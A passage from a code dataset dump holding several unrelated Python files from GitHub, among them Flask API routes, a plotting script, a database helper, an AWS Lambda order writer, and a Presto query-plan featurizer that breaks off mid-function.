d","repo_name":"sangm1n/problem-solving","sub_path":"CodeUp/[009~025] 기초-입출력/025.py","file_name":"025.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38648370952","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# SPDX-License-Identifier: AGPL-3.0-or-later\n\nimport os\nimport glob\nfrom datetime import datetime\n\n\ndef get_files_tree():\n root = \"static/\"\n tree = {}\n for file_path in glob.iglob('static/**', recursive=True):\n file_path = file_path.replace(root, \"\")\n file_dir = \"/\".join(file_path.split(\"/\")[:-1])\n if file_dir not in tree:\n tree[file_dir] = []\n file_name = file_path.split(\"/\")[-1]\n tree[file_dir].append(file_name)\n if \"\" in tree:\n del tree[\"\"]\n return tree\n\n\ndef sizeof_fmt(num, suffix=\"B\"):\n for unit in [\"\", \"Ki\", \"Mi\", \"Gi\", \"Ti\", \"Pi\", \"Ei\", \"Zi\"]:\n if abs(num) < 1024.0:\n return f\"{num:3.1f} {unit}{suffix}\"\n num /= 1024.0\n return f\"{num:.1f} Yi{suffix}\"\n\n\ndef recursive_generate_index_pages(env):\n tree = get_files_tree()\n\n for file_dir in tree:\n file_dir_split = file_dir.split(\"/\")\n\n marker_path_menu = []\n marker_files = []\n for i, split_dir in enumerate(file_dir_split):\n marker_path_menu.append([\"../\"*(len(file_dir_split)-i-1), split_dir])\n\n for file in sorted(tree[file_dir]):\n if file == \"index.html\":\n continue\n\n file_path = f\"{file_dir}/{file}\"\n static_file_path = \"static/\"+file_path\n file_is_dir = os.path.isdir(static_file_path)\n file_size = os.path.getsize(static_file_path) if not file_is_dir else \"-1\"\n file_size_fmt = sizeof_fmt(file_size) if not file_is_dir else \"—\"\n modified = os.path.getmtime(static_file_path)\n file_modified = datetime.fromtimestamp(modified).strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n file_modified_fmt = datetime.fromtimestamp(modified).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n marker_files.append({\n \"is_dir\": file_is_dir,\n \"name\": file,\n \"path\": f\"./{file}\",\n \"size\": file_size,\n \"size_fmt\": file_size_fmt,\n \"modified\": file_modified,\n \"modified_fmt\": file_modified_fmt\n })\n\n markers = {\n \"path\": \"/\"+file_dir,\n \"path_menu\": marker_path_menu,\n \"files\": marker_files,\n \"count_dirs\": sum(x['is_dir'] is True for x in marker_files),\n \"count_files\": sum(x['is_dir'] is False for x in marker_files)\n }\n template = env.get_template(\"__folder_index__.html\")\n html = template.render(markers)\n path = f\"static/{file_dir}/index.html\"\n with open(path, \"w\") as fh:\n fh.write(html)\n","repo_name":"IITC-CE/website","sub_path":"pages/__filelist__.py","file_name":"__filelist__.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10524671126","text":"from flask import Blueprint, abort, jsonify, request\nfrom flaskr.models.models import Classes, Schools\nfrom flaskr.Classes.utils import checkClasses, addClassToDB\n\nclasses = Blueprint('classes', __name__)\n\n\n@classes.route('/api/classes')\ndef get_classes():\n classes_query = Classes.query.order_by('id').all()\n\n if not classes_query:\n abort(404, 'No Classes')\n\n classes_list = [c.display() for c in classes_query]\n\n return jsonify({\n 'classes': classes_list,\n 'success': True\n })\n\n\n@classes.route('/api/classes/')\ndef get_class(class_id):\n class_ = Classes.query.get(class_id)\n\n if not class_:\n abort(404, f'No Class with ID#{class_id}')\n\n class_ = class_.display()\n\n return jsonify({\n 'class': class_,\n 'success': True\n })\n\n\n@classes.route('/api/classes', methods=['POST'])\ndef create_classes():\n\n req = request.get_json()\n\n # Check if request is valid\n if not req:\n abort(400, 'Fields Shouldn\\'t Be Empty!')\n\n grade = req.get('class')\n school_id = req.get('school')\n\n school = Schools.query.get(school_id)\n\n # Check if important data exists in request body\n if not grade or not school:\n abort(422, 'Fields Shouldn\\'t Be Empty!')\n\n # Check if class already exist in the school\n if checkClasses():\n abort(400, f'A Class Is Already Registered In this School With: {grade}')\n\n body = {\n 'grade': grade,\n 'school': school\n }\n\n # Add class to the database\n try:\n addClassToDB(body)\n except Exception as e:\n print(e)\n abort(500, 'Something Went Wrong In Our End.')\n\n # return success value, and class info\n return jsonify({\n 'class': f'Class \"{grade}\" was created successfully!',\n 'success': True\n })\n\n\n@classes.route('/api/classes/', methods=['DELETE'])\ndef delete_classes(class_id):\n class_ = Classes.query.get(class_id)\n # Check if class exist, if not return 404\n if not class_:\n abort(404, f'No Class with ID#{class_id}')\n\n # try to delete class from database\n class_name = class_.grade\n try:\n class_.delete()\n\n except Exception as e:\n print(e)\n abort(500, 'Something Went Wrong In Our End.')\n\n return jsonify({\n 'class': f'Class \"{class_name}\" has ben deleted!',\n 'succes': True\n })\n\n\n@classes.route('/api/classes/', methods=['PATCH'])\ndef update_classes(class_id):\n class_ = Classes.query.get(class_id)\n\n # Check if class exists\n if not class_:\n abort(404, f'No Class with ID#{class_id}')\n\n req = request.get_json()\n\n # Check if request is valid\n if not req:\n abort(400, 'Fields Shouldn\\'t Be Empty!')\n\n updated_grade = req.get('class')\n updated_school_id = req.get('school')\n\n try:\n if updated_grade:\n class_.grade = updated_grade\n else:\n raise Exception\n if updated_school_id:\n pass\n # updated_school = Schools.query.get(updated_school_id)\n # class_.school = updated_school\n\n class_.update()\n\n except Exception as e:\n print(e)\n abort(422, 'Cannot Update This Class.')\n\n return jsonify({\n 'class': f'Class \"{class_.grade}\" has been updated!',\n 'success': True\n })\n","repo_name":"Ebra01/SsMS","sub_path":"flaskr/Classes/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27473761172","text":"import numpy as np\nimport numpy \nimport math\nfrom models import interpolation , SRCNN_train , SRCNN_model, SRCNN_predict , DNCNN_train , DNCNN_model , DNCNN_predict\n#from scipy.misc import imresize\nfrom scipy.io import loadmat\nimport matplotlib.pyplot as plt\n\nimport matplotlib\n\nif __name__ == \"__main__\":\n # load datasets \n channel_model = \"VehA\"\n SNR = 22\n Number_of_pilots = 48\n num_pilots = Number_of_pilots\n perfect = loadmat(\"Perfect_\"+ channel_model +\".mat\")['My_perfect_H']\n noisy_input = loadmat(\"Noisy_\" + channel_model + \"_\" + \"SNR_\" + str(SNR) + \".mat\") ['My_noisy_H']\n # [channel_model+\"_noisy_\"+ str(SNR)] \n \n interp_noisy = interpolation(noisy_input , SNR , Number_of_pilots , 'rbf')\n\n perfect_image = numpy.zeros((len(perfect),72,14,2))\n print (perfect_image.ndim)\n a = perfect_image[:,:,:,0] = numpy.real(perfect)\n print (perfect_image[:,:,:,0].ndim)\n perfect_image[:,:,:,1] = numpy.imag(perfect)\n perfect_image = numpy.concatenate((perfect_image[:,:,:,0], perfect_image[:,:,:,1]), axis=0).reshape(2*len(perfect), 72, 14, 1)\n \n # 80000, 72, 14 , 1 is the new dimension \n # ####### ------ training SRCNN ------ #######\n # idx_random = numpy.random.rand(len(perfect_image)) < (1/9) # uses 32000 from 36000 as training and the rest as validation\n # train_data, train_label = interp_noisy[idx_random,:,:,:] , perfect_image[idx_random,:,:,:]\n # val_data, val_label = interp_noisy[~idx_random,:,:,:] , perfect_image[~idx_random,:,:,:] \n\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n\n\nfig = plt.figure()\n \n# syntax for 3-D projection\nax = plt.axes(projection ='3d')\n\n# z = np.linspace (1,2,10)\n# x = numpy.real(perfect)\n# y = np.linspace (1,4,10)\n# print (perfect_image[1,2,3,0])\n# x,y,z = perfect_image[:,:,:,0]\n# defining all 3 axis\n\n# plotting\n\n# For each set of style and range settings, plot n random points in the box\n# defined by x in [23, 32], y in [0, 100], z in [zlow, zhigh].\n# for m, zlow, zhigh in [('o', -50, -25), ('^', -30, -5)]:\n# i = -1 \n# j = -1\n# k = -1\n# flag = 0 \n# print (a.ndim)\n# print (a.shape)\n# for index in a:\n# i = i + 1\n# j = -1\n# for freq in index:\n# j = j + 1\n# k = -1\n# for time in freq:\n# k = k + 1\n# magnitude = a[i,j,k]\n\n# if flag == 0 :\n# vmin = magnitude \n# vmax = magnitude \n# flag = 1\n# elif flag == 1 :\n# if magnitude < vmin :\n\n# vmin = magnitude \n# elif magnitude > vmax :\n# vmax = magnitude \n\n# print (vmax)\n# print (vmin)\n\nvmax = 3.284971134622097\nvmin = -3.1601099347835957\n\ni = -1 \nj = -1 \nk = -1\ncount = -1\nm = 10000\nfor index in a:\n i = i + 1\n j = -1\n\n if count == m :\n break \n\n for freq in index:\n j = j + 1\n k = -1\n\n if count == m :\n break \n\n for time in freq:\n k = k + 1\n magnitude = a[i,j,k]\n \n # plot = ax.scatter(k, j, magnitude, c = magnitude, cmap='viridis', marker='o') # s is marker size # norm = Normalize \n\n plot = ax.scatter(k, j, i, c = i , cmap='viridis', marker=\".\", norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax, clip=False)) \n # s is marker size # norm = Normalize \n\n count = count + 1 \n if count == m :\n break \n# print (x)\n# print (y)\n# print (z)\n# plot = ax.scatter(x, y, z, c = z, cmap='viridis', marker='o') # s is marker size # norm = Normalize \n\nplt.colorbar(plot) # mappable was found to use for colorbar creation\n\nax.set_title('3D line plot geeks for geeks')\n\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\nplt.show()\n\n\n# the math is that computer is good to solve all visual but , how to take x,y,z from perfet_image , \n# if perfect_image [:::0] then only 1 value return is magnitude ","repo_name":"WandererGuy/ChannelNet2","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34878126051","text":"import os\n\n\nfrom parser.censys import CensysParser\n\n\nif __name__ == '__main__':\n\n ip = input('Введите айпи в формате x.x.x.x')\n\n os.environ['CENSYS_API_URL'] = 'https://search.censys.io/hosts/' + ip\n\n parser = CensysParser()\n\n parser\\\n .request()\\\n .perform()\\\n .parse()\\\n .export()\n","repo_name":"eternityxxxx/osint-parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70041225654","text":"import json\nfrom os import path\n\nimport datetime\n\n\nclass Database(object):\n def __init__(self, dirpath=\"db/\", path_prefix=\"\"):\n self.folder_path = dirpath\n self.path_prefix = path_prefix\n\n def _load_file(self, filename: str, default=\"{}\"):\n fp = self.path_prefix + self.folder_path + filename\n self._check_file(fp, default)\n return json.load(open(fp, 'r'))\n\n def _dump_file(self, data, filename: str):\n fp = self.path_prefix + self.folder_path + filename\n json.dump(data, open(fp, 'w+'))\n\n def __get_file(self, fp):\n if not path.isfile(self.path_prefix + fp):\n return []\n return json.load(open(self.path_prefix + fp))\n\n def _check_file(self, fp, default):\n if not path.isfile(self.path_prefix + fp):\n open(self.path_prefix + fp, \"w+\").write(default)\n\n def get_event_oprs(self, event_id):\n from server.models import OprEntry\n entries = OprEntry.query.filter_by(event=event_id).all()\n data = {}\n for entry in entries:\n if entry.team not in data.keys():\n data[entry.team] = {}\n if entry.score_key not in data[entry.team].keys():\n data[entry.team][entry.score_key] = entry.value\n return data\n\n def get_table_headers(self, event, key):\n file_path = self.path_prefix + 'clooney/headers/{}.json'.format(event)\n headers = json.load(open(file_path))\n if key not in headers.keys():\n return []\n else:\n for i in range(len(headers[key])):\n headers[key][i]['sort_id'] = chr(ord('a') + i)\n return headers[key]\n\n def get_raw_data(self, event_id):\n from server.models import ScoutingEntry\n entries = ScoutingEntry.query.filter_by(event=event_id).all()\n return [elem.to_dict()[\"data\"] for elem in entries]\n\n def get_stats_last_modified(self, event_id):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event=event_id, key=\"stats\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_raw_last_modified(self, event_id):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event=event_id, key=\"raw\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_event_list_last_modified(self):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event='all', key=\"event_list\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_opr_last_modified(self):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event='all', key=\"opr\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_event_last_modified(self, event_id):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event=event_id, key=\"event\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_stats(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"avg\").all()\n oprs = self.get_event_oprs(event_id)\n calc = AnalysisEntry.query.filter_by(event=event_id, key=\"calc\").all()\n calc = dict(zip(map(lambda x: x.team, calc), map(lambda x: x.get_data(), calc)))\n for entry in entries:\n data = entry.get_data()\n team_number = data[\"team_number\"][\"value\"]\n if team_number in oprs.keys():\n opr_dict = oprs[team_number]\n data[\"opr\"] = dict(zip(opr_dict.keys(), map(lambda x: round(x, 1), opr_dict.values())))\n if team_number in calc.keys():\n data[\"calc\"] = calc[int(team_number)]\n entry.set_data(data)\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n\n def get_avg_data(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"avg\").all()\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n\n def get_calculated_data(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"calc\").all()\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n\n def get_pit_scouting(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"pit\").all()\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n","repo_name":"kForth/ClooneyWebServer","sub_path":"server/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19153343772","text":"import os\nimport uuid\n\nimport psycopg2\nimport ujson\n\n\ndef lambda_handler(event: dict, context: object) -> bool:\n for record in event[\"Records\"]:\n process_record(record, context.aws_request_id)\n\n return True\n\n\ndef process_record(record: dict, source: uuid.UUID):\n event_body = ujson.loads(record[\"body\"])[\"Message\"]\n event_body = ujson.loads(event_body)\n\n shipment = {\n \"carrier\": event_body[\"carrier\"],\n \"weight\": event_body[\"weight\"],\n \"length\": event_body[\"length\"],\n \"width\": event_body[\"width\"],\n \"height\": event_body[\"height\"],\n \"is_sortable\": event_body[\"is_sortable\"],\n \"price\": {\n \"amount\": event_body[\"price\"][\"amount\"],\n \"currency\": event_body[\"price\"][\"currency\"],\n },\n }\n\n # There should be some order logic\n\n persist_order(shipment, source)\n\n\ndef persist_order(shipment: dict, source_id: uuid):\n host = os.environ[\"RDS_HOST\"]\n port = os.environ[\"RDS_PORT\"]\n username = os.environ[\"RDS_USERNAME\"]\n password = os.environ[\"RDS_PASSWORD\"]\n\n conn = psycopg2.connect(\n host=host, port=port, database=\"postgres\", user=username, password=password\n )\n\n cursor = conn.cursor()\n cursor.execute(\n \"INSERT INTO orders (carrier, weight, length, width, height, is_sortable, price, currency, source) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\",\n (\n shipment[\"carrier\"],\n shipment[\"weight\"],\n shipment[\"length\"],\n shipment[\"width\"],\n shipment[\"height\"],\n shipment[\"is_sortable\"],\n shipment[\"price\"][\"amount\"],\n shipment[\"price\"][\"currency\"],\n source_id,\n ),\n )\n\n conn.commit()\n cursor.close()\n conn.close()\n","repo_name":"sdarmofal/cloudier","sub_path":"src/order/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22510939905","text":"from control_files.fcrb_keys_and_sats import fcrb_sats\nfrom control_files.ustan_keys_and_sats import ustan_sats\nfrom control_files.zmc_keys_and_sats import zmc_sats\nimport copy\n\nustan_diagnostic = {'tag': 'diagnostic', 'source': 'ustan.general', 'fields': ['chi', 'incidence_date', 'site_icd_10', 'name', 'first_seen_date', 'site', 'histology', 'primary', 'metastasis1', 'metastasis2', 'metastasis3', 'cong_heart_fail_flag', 'con_tiss_disease_rheum_flag', 'dementia_flag', 'pulmonary_flag', 'con_tiss_flag', 'diabetes_flag', 'para_hemiplegia_flag',\n 'renal_flag', 'liver_flag', 'aids_hiv_flag', 'cancer_flag', 'charlson_score', 'age', 'side', 'gender', 'age_at_diagnosis', 'weight', 'bmi', 'height', 'ref_hospital', 'stage', 'stage_detail', 'tnm_t', 'tnm_t_detail', 'tnm_n', 'tnm_n_detail', 'tnm_m', 'perf_stat', 'smr01_flag', 'gp_name', 'survival_days', 'gp_id'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nfcrb_diagnostic_1 = {'tag': 'diagnostic', 'source': 'fcrb.diagnostic', 'fields': [\n 'einri', 'patnr', 'falnr', 'pernr', 'lfdnr', 'dkey1'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nfcrb_diagnostic_2 = {'tag': 'diagnostic', 'source': 'fcrb.episode', 'fields': [\n 'patnr', 'falnr'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nfcrb_treatments = {'tag': 'treatments', 'source': 'fcrb.episode', 'fields': ['patnr', 'bekat'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\n\n\nzmc_diagnostic_1 = {'tag': 'diagnostic', 'source': 'zmc.complaints_and_diagnosis', 'fields': ['patnr', 'complaints_and_diagnosis', 'status', 'specialism', 'type',\n 'name_of_diagnosis_or_complaint', 'anatomical_location', 'laterality', 'begin_date', 'end_date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_2 = {'tag': 'diagnostic', 'source': 'zmc.bloodpressure', 'fields': ['patnr', 'value', 'position', 'description', 'date', 'systolic_bloodpressure',\n 'diastolic_bloodpressure', 'measurement_method', 'manchette_type', 'measurement_location', 'description'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_3 = {'tag': 'diagnostic', 'source': 'zmc.weight', 'fields': [\n 'patnr', 'measurement', 'clothes', 'description', 'date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_4 = {'tag': 'diagnostic', 'source': 'zmc.length', 'fields': [\n 'patnr', 'measurement', 'description', 'date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_5 = {'tag': 'diagnostic', 'source': 'zmc.registered_events', 'fields': [\n 'patnr', 'type', 'method', 'anatomical_location', 'laterality', 'start_date', 'end_date', 'indication', 'requested_by', 'date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_6 = {'tag': 'diagnostic', 'source': 'zmc.functional_or_mental_state', 'fields': [\n 'patnr', 'name', 'value', 'date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_7 = {'tag': 'diagnostic', 'source': 'zmc.patient_details', 'fields': [\n 'patnr', 'nname', 'nnams', 'vname', 'titel', 'gschl', 'gbdat', 'natio'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\n\nustan_tags = [ustan_diagnostic]\nfcrb_tags = [fcrb_diagnostic_1,\n fcrb_diagnostic_2,\n fcrb_treatments]\n \nzmc_tags = [zmc_diagnostic_1,\n zmc_diagnostic_2,\n zmc_diagnostic_3,\n zmc_diagnostic_4,\n zmc_diagnostic_5,\n zmc_diagnostic_6,\n zmc_diagnostic_7]\n\ndef hospital_picker(hospital):\n if hospital == 'FCRB':\n return copy.deepcopy(fcrb_sats), fcrb_tags\n elif hospital == 'USTAN':\n return copy.deepcopy(ustan_sats), ustan_tags\n elif hospital == 'ZMC':\n return copy.deepcopy(zmc_sats), zmc_tags\n\ndef table_picker(tag_names, tags):\n return [tag['source'] for tag in tags if tag['tag'] in [tag_name for tag_name in tag_names]]\n\ndef sat_picker(tables, sat_definitions):\n sat_names = []\n for table in tables:\n try:\n sat_definitions[table].pop('links')\n except:\n print(f\"Already popped: {table}\")\n sat_names.extend([sat_name for sat_name in sat_definitions[table]])\n return sat_names\n\n# tables, tags = hospital_picker('FCRB')\n# table_names = table_picker('diagnostic',tags )\n# print(table_names)\n# sats = []","repo_name":"SkinnyPigeon/new_dv_tests","sub_path":"development/tags_and_sats.py","file_name":"tags_and_sats.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17211258017","text":"from sklearn.externals import joblib\nfrom flask import Flask, request\nfrom jinja2 import Template\n\np = joblib.load('sentiment-model.pkl')\n\napp = Flask(__name__)\n\ndef pred(text):\n return p.predict([text])[0]\n\n@app.route('/')\ndef index():\n text = request.args.get('text')\n if text:\n prediction = pred(text)\n else:\n prediction = \"\"\n\n template = Template(\"\"\"\n \n \n

    Sentiment Analysis

    \n

    Type a mesage here:

    \n
    \n \n \n
    \n

    Your input is: {{ text }}

    \n

    Prediction: {{ prediction }}

    \n \n \n \"\"\")\n\n return template.render(prediction=prediction, text=text)\n\n\nif __name__ == '__main__':\n app.run(port=8000)\n","repo_name":"anaerobeth/ml-mastery","sub_path":"pipeline-server.py","file_name":"pipeline-server.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38181308855","text":"import numpy as np\nfrom utils.custom_logging import logger\nfrom inference.preprocessing.preprocessor import QueryPlanPreprocessor\n\n# The following operators can be found in Presto query plans\nOUTPUT = 'Output'\nAGGREGATE = 'AGGREGATE'\nAGGREGATE_FINAL = 'Aggregate(FINAL)'\nAGGREGATE_PARTIAL = 'Aggregate(PARTIAL)'\nLOCAL_EXCHANGE = 'LocalExchange'\nREMOTE_EXCHANGE = 'RemoteStreamingExchange'\nFILTER = 'Filter'\nTABLE_SCAN = 'TableScan'\nPROJECT = 'Project'\nINNER_JOIN = 'InnerJoin'\nCROSS_JOIN = 'CrossJoin'\nSEMI_JOIN = 'SemiJoin'\nLEFT_JOIN = 'LeftJoin'\nRIGHT_JOIN = 'RightJoin'\nVALUES = 'Values'\n\n# Composite operators\nSCAN_FILTER_PROJECT = 'ScanFilterProject'\nSCAN_FILTER = 'ScanFilter'\nSCAN_PROJECT = 'ScanProject'\n\nUNARY_OPERATORS = [OUTPUT, AGGREGATE, AGGREGATE_PARTIAL, AGGREGATE_FINAL, LOCAL_EXCHANGE, REMOTE_EXCHANGE, SCAN_FILTER_PROJECT, FILTER, PROJECT, TABLE_SCAN,\n VALUES]\nBINARY_OPERATORS = [INNER_JOIN, CROSS_JOIN, SEMI_JOIN, LEFT_JOIN, RIGHT_JOIN]\nLEAF_TYPES = [TABLE_SCAN, VALUES]\nENCODED_TYPES = list(sorted(list(set(UNARY_OPERATORS + BINARY_OPERATORS) - {OUTPUT, SCAN_FILTER_PROJECT, SCAN_FILTER, SCAN_PROJECT})))\n\n# The following attributes can be found in each node of a presto query plan\nCHILDREN = 'children'\nNODE_TYPE = 'name'\nESTIMATES = 'estimates'\nTABLE_NAME = 'tableName'\nPREPROCESSED = 'preprocessed'\n\n# The following attributes can be found in the presto query plan statistics of leaf nodes (e.g. TableScan, ScanFilterProject, etc.)\nROWS = 'rows'\nROW_SIZE = 'rowsSize'\nCPU_COST = 'cpuCost'\nMAX_MEMORY = 'maxMemory'\nMAX_MEMORY_OUTPUT = 'maxMemoryWhenOutputting'\nNETWORK_COST = 'networkCost'\n\n\nclass MalformedQueryPlanException(Exception):\n pass\n\n\nclass TreeBuilderException(Exception):\n def __init__(self, msg):\n Exception.__init__(self, msg)\n\n\ndef is_binary_operator(node):\n return node[NODE_TYPE] in BINARY_OPERATORS\n\n\ndef is_unary_operator(node):\n return node[NODE_TYPE] in UNARY_OPERATORS\n\n\ndef is_leaf_operator(node):\n return node[NODE_TYPE] in LEAF_TYPES\n\n\nclass TreeBuilder:\n \"\"\"This class gets invoked by the TreeFeaturizer; it preprocesses a query plan before it is fed to the TCNN\"\"\"\n\n def __init__(self, stats_extractor, relations):\n self.__stats = stats_extractor\n # pylint: disable=unused-private-member\n self.__relations = sorted(relations)\n\n def __featurize_binary_operator(self, node):\n assert is_binary_operator(node)\n arr = np.zeros(len(ENCODED_TYPES) + 1)\n arr[ENCODED_TYPES.index(node[NODE_TYPE])] = 1\n return np.concatenate((arr, self.__stats(node)))\n\n def __featurize_unary_operator(self, node):\n assert is_unary_operator(node)\n arr = np.zeros(len(ENCODED_TYPES) + 1)\n arr[ENCODED_TYPES.index(node[NODE_TYPE])] = 1\n return np.concatenate((arr, self.__stats(node)))\n\n def __featurize_null_operator(self):\n arr = np.zeros(len(ENCODED_TYPES) + 1)\n arr[-1] = 1 # declare as null vector\n return np.concatenate((arr, self.__stats.get_null_stats()))\n\n def plan_to_feature_tree(self, node):\n \"\"\"This method recursively traverses the query plan and returns a feature tree\"\"\"\n children = node[CHILDREN] if CHILDREN in node else []\n # do not encode output nodes and combined table_scans\n if node[NODE_TYPE] not in ENCODED_TYPES:\n assert len(children) == 1\n return self.plan_to_feature_tree(children[0])\n\n if is_binary_operator(node):\n assert len(children) == 2\n featurized_node = self.__featurize_binary_operator(node)\n left = self.plan_to_feature_tree(children[0])\n right = self.plan_to_feature_tree(children[1])\n return featurized_node, left, right\n\n if is_leaf_operator(node):\n assert not children\n return self.__featurize_unary_operator(node)\n\n if is_unary_operator(node):\n child = self.plan_to_feature_tree(children[0])\n assert len(children) <= 1\n return self.__featurize_unary_operator(node), child, self.__featurize_null_operator()\n\n raise TreeBuilderException('Node was neither transparent, nor a join or a scan: ' + str(node))\n\n\ndef _normalize(x, lo, hi):\n if hi == lo:\n logger.warning('[WARNING] normalization divide by zero')\n return np.infty if (np.log(x + 1) - lo) > 0 else -np.infty\n return (np.log(x + 1) - lo) / (hi - lo)\n\n\ndef _get_buffer_count_for_leaf(leaf, buffers):\n total = 0\n if TABLE_NAME in leaf:\n total += buffers.get(leaf[TABLE_NAME], 0)\n\n if 'Index Name' in leaf:\n total += buffers.get(leaf['Index Name'], 0)\n\n return total\n\n\nclass StatExtractor:\n \"\"\"Extract statistics such as min and max from a query plan\"\"\"\n\n def __init__(self, fields, mins, maxs):\n self.__fields = fields\n self.__mins = mins\n self.__maxs = maxs\n\n def __call__(self, inp):\n estimates = inp[ESTIMATES] if ESTIMATES in inp else {}\n res = []\n for f, lo, hi in zip(self.__fields, self.__mins, self.__maxs):\n if f not in estimates or estimates[f] == 0.0 or estimates[\n f] == 'NaN':\n res += [0, 0]\n else:\n res += [1, _normalize(np.log(estimates[f] + 1), lo, hi)]\n return res\n\n def get_null_stats(self):\n # create null value\n return [0.0] * (2 * len(self.__fields))\n\n\ndef _get_plan_stats(data):\n costs = []\n rows = []\n\n def process_estimates(node):\n estimates = node[ESTIMATES]\n cpu_estimate = estimates[CPU_COST]\n rows_estimate = estimates[ROWS]\n if not cpu_estimate in (0, 'NaN'):\n costs.append(cpu_estimate)\n if not rows_estimate in (0, 'NaN'):\n rows.append(rows_estimate)\n\n def recurse(node):\n if ESTIMATES in node:\n process_estimates(node)\n\n if CHILDREN in node:\n for child in node[CHILDREN]:\n recurse(child)\n\n for plan in data:\n recurse(plan)\n\n costs = np.array(costs)\n rows = np.array(rows)\n\n costs = np.log(costs + 1)\n rows = np.log(rows + 1)\n\n costs_min = 0 if len(costs) == 0 else np.min(costs)\n costs_max = 1 if len(costs) == 0 else np.max(costs)\n rows_min = 0 if len(rows) == 0 else np.min(rows)\n rows_max = 1 if len(rows) == 0 else np.max(rows)\n\n return StatExtractor([CPU_COST, ROWS], [costs_min, rows_min], [costs_max, rows_max])\n\n\ndef _get_all_relations(data):\n all_rels = []\n\n def recurse(plan):\n if TABLE_NAME in plan:\n yield plan[TABLE_NAME]\n\n if CHILDREN in plan:\n for child in plan[CHILDREN]:\n yield from recurse(child)\n\n for plan in data:\n all_rels.extend(list(recurse(plan)))\n\n return set(all_rels)\n\n\ndef _attach_buf_data(tree):\n if 'Buffers' not in tree:\n return\n\n buffers = tree['Buffers']\n\n def recurse(n):\n if 'Plans' in n:\n for child in n['Plans']:\n recurse(child)\n return\n\n # it is a leaf\n n['Buffers'] = _get_buffer_count_for_leaf(n, buffers)\n\n recurse(tree['Plan'])\n\n\ndef _preprocess_scan_filter_project(plan):\n # assert len(plan['estimates']) == 3\n scan_node = {\n NODE_TYPE: TABLE_SCAN,\n }\n filter_node = {\n NODE_TYPE: FILTER,\n CHILDREN: [scan_node],\n }\n plan[NODE_TYPE] = PROJECT\n plan[CHILDREN] = [filter_node]\n plan[PREPROCESSED] = True\n\n\ndef _preprocess_scan_project(plan):\n scan_node = {NODE_TYPE: TABLE_SCAN}\n plan[NODE_TYPE] = 